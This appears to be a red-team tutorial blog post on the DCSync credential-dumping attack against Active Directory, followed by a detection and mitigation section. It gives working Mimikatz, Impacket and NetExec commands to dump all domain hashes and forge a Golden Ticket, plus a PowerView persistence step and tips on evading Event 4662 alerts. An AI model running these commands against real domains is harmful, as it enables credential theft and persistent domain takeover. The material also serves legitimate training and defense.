What Is a DCSync Attack?

DCSync is a credential dumping technique that abuses Active Directory’s replication mechanism. Instead of running code on a Domain Controller, an attacker with the right privileges impersonates a Domain Controller and requests password data directly from another DC using the MS-DRSR (Directory Replication Service Remote Protocol).

The result: you get NTLM hashes, Kerberos keys, and plaintext passwords (in some configurations) for any account in the domain — including krbtgt and Domain Admins — without ever touching LSASS on a DC.

It’s one of the most powerful post-exploitation techniques in Active Directory environments. If you can run DCSync, you own the domain.


Why DCSync Is Dangerous

Normal tools like sekurlsa::logonpasswords require running code on a DC and accessing LSASS memory. DCSync doesn’t:

  • No code execution on a DC — you run it from your own machine or a compromised workstation
  • No LSASS tampering — no EDR hooks triggered on the DC
  • Dumps any accountkrbtgt hash → Golden Ticket. Any admin hash → Pass-the-Hash
  • Persistent access — dump krbtgt, change your foothold account password, still have the hash

The only requirement is network access to a DC and the right privileges.


Required Privileges

DCSync requires one of the following:

PrivilegeNotes
Domain AdminsHas replication rights by default
Enterprise AdminsSame
Domain Controllers groupSame
Replicating Directory Changes AllThe specific ACE needed — can be granted to any account
Replicating Directory Changes + Replicating Directory Changes In Filtered SetBoth needed together for full dump

The dangerous scenario is the third: any low-privileged account can be granted these ACEs by a Domain Admin — intentionally or accidentally. Attackers with DA access often grant this to a service account for persistence before giving up their DA foothold.


DCSync with Mimikatz

Basic Syntax

Run from any machine with network access to a DC (not necessarily the DC itself):

mimikatz # lsadump::dcsync /domain:corp.local /user:Administrator

This dumps the Administrator account’s NTLM hash, LM hash (if present), and Kerberos keys.

Dump a Specific User

mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt

The krbtgt hash is the golden ticket. Once you have it, you can forge Kerberos TGTs for any account, any time — even after password resets (the old hash works until krbtgt is reset twice).

Dump All Domain Hashes

mimikatz # lsadump::dcsync /domain:corp.local /all /csv

/all dumps every account. /csv outputs clean comma-separated format — easier to parse and import into Hashcat.

Specify a Domain Controller

mimikatz # lsadump::dcsync /domain:corp.local /dc:dc01.corp.local /user:Administrator

Useful when you want to target a specific DC or avoid routing through the primary.


DCSync with Impacket (No GUI Needed)

If you’re operating from a Linux machine, Impacket’s secretsdump.py is often cleaner:

# With NTLM hash (Pass-the-Hash)
python3 secretsdump.py -hashes :NTLMHASH corp.local/[email protected]

# With password
python3 secretsdump.py corp.local/Administrator:'Password123!'@dc01.corp.local

# Dump just DCSync (not SAM/LSA)
python3 secretsdump.py -just-dc corp.local/Administrator:'Password123!'@dc01.corp.local

# Dump NTLM hashes only (no Kerberos keys)
python3 secretsdump.py -just-dc-ntlm corp.local/Administrator:'Password123!'@dc01.corp.local

secretsdump.py also performs DCSync under the hood — it’s the same MS-DRSR protocol calls.


DCSync with NetExec

If you’ve already compromised credentials and want quick confirmation:

# Dump krbtgt hash
nxc smb dc01.corp.local -u Administrator -p 'Password123!' --ntds --user krbtgt

# Dump all hashes
nxc smb dc01.corp.local -u Administrator -p 'Password123!' --ntds

NetExec wraps Impacket’s secretsdump under the hood. Useful when you’re already running NXC in your workflow and don’t want to switch tools.


Full Attack Chain: From DA to Golden Ticket

Here’s how DCSync fits into a typical AD engagement:

Step 1: Achieve Domain Admin

Options:

  • Kerberoasting a privileged account
  • Pass-the-Hash on a DA account
  • ASREPRoasting + cracking
  • Exploiting misconfigurations (GenericAll, WriteDACL on DA group)

Once you’re DA (or have an account with replication rights):

Step 2: Dump krbtgt Hash

mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt

Note the NTLM hash (the line labeled Hash NTLM:).

Step 3: Forge a Golden Ticket

mimikatz # kerberos::golden /user:fakeadmin /domain:corp.local /sid:S-1-5-21-XXXXXXXXXX /krbtgt:KRBTGTHASH /ptt

/ptt = pass-the-ticket, injects directly into the current session.

Step 4: Verify

mimikatz # kerberos::list
dir \\dc01.corp.local\C$

If dir returns the DC’s C drive, you’re in.


DCSync for Persistence

Before wrapping up an engagement, smart red teamers:

  1. Grant a low-privileged account DCSync rights — doesn’t appear in Domain Admins, harder to find
  2. Dump krbtgt — Golden Ticket is valid for 10 years by default
  3. Dump machine account hashes — useful for Silver Tickets

To grant DCSync rights to an account without being DA:

# With PowerView
Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" `
  -PrincipalIdentity svcBackup `
  -Rights DCSync

The account svcBackup can now run DCSync indefinitely, even after your DA session ends.


Practical Notes for Engagements

Network requirements: Your attacking machine needs TCP 445 and TCP 135 + dynamic RPC to the DC. If you’re on a segmented VLAN, DCSync may fail even with valid creds — check firewall rules.

Opsec: DCSync generates Event ID 4662 on the DC (Directory Service Access). Modern SIEM/MDR stacks alert on this. If you’re going quiet, use Mimikatz’s /guid flag or run during business hours when replication noise is higher.

Mimikatz must run as local admin or SYSTEM on your attacking machine. The replication happens over the network, but Mimikatz needs those local privileges to call the necessary APIs.

Multiple DCs: In large environments with multiple DCs, specify /dc to target one and avoid inconsistent results from replication lag.


Detection and Defense

Detection

Event IDDescription
4662Object access with replication permissions — the main DCSync telemetry
4673Privileged service called
5136Directory service object modified — fires when DCSync ACEs are added

Alert when Event 4662 fires on a DC with these access rights:

  • {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} — Replicating Directory Changes
  • {1131f6ab-9c07-11d1-f79f-00c04fc2dcd2} — Replicating Directory Changes All
  • {89e95b76-444d-4c62-991a-0facbeda640c} — Replicating Directory Changes In Filtered Set

The key signal: these events firing from a non-DC machine account or non-standard account.

Microsoft Defender for Identity (MDI)

MDI detects DCSync natively — it’s listed as a high-severity alert. MDI compares the requesting machine against known DCs. A workstation requesting AD replication is an immediate red flag.

Mitigations

Audit replication rights regularly:

# Find accounts with DCSync rights
(Get-Acl "AD:\DC=corp,DC=local").Access | Where-Object {
  $_.ActiveDirectoryRights -like "*ExtendedRight*" -and
  ($_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or
   $_.ObjectType -eq "1131f6ab-9c07-11d1-f79f-00c04fc2dcd2")
}

Enforce least privilege — no service accounts with replication rights unless operationally necessary.

Tier 0 isolation — Domain Controllers should not be reachable from workstations on port 445/135. VLAN segmentation breaks the attack even if credentials are compromised.

Reset krbtgt periodically — Microsoft recommends twice (to invalidate all existing tickets). Resets must be done carefully in multi-DC environments to avoid replication issues.


Lab It Yourself

The best way to get comfortable with DCSync is hands-on. Spin up an AD lab with a DC and a member machine:

  • Vultr — cheapest Windows Server instances, fast spinup, destroy when done: vultr.com
  • DigitalOcean — solid Windows droplets if you prefer DO’s ecosystem: digitalocean.com

A basic lab needs: 1 DC (Windows Server 2019/2022) + 1 Windows 10/11 workstation. You can run both on a single Vultr high-frequency instance with enough RAM if budget is tight.

For structured AD attack training, BloodHound Academy and the HTB Pro Labs (RastaLabs, Offshore) give you real multi-domain environments without the setup overhead.


Key Takeaways

  • DCSync abuses MS-DRSR replication — no code on the DC, no LSASS touch
  • Requires DA, EA, or accounts with Replicating Directory Changes All rights
  • krbtgt hash = Golden Ticket = persistent domain access
  • Mimikatz and Impacket secretsdump.py both implement DCSync
  • Detection: Event ID 4662 from non-DC accounts; MDI catches this natively
  • Defense: audit replication ACEs, segment DCs, reset krbtgt regularly

What’s Next


Need a professional red team report after your engagement? CipherWrite delivers pentest-grade documentation written by security professionals.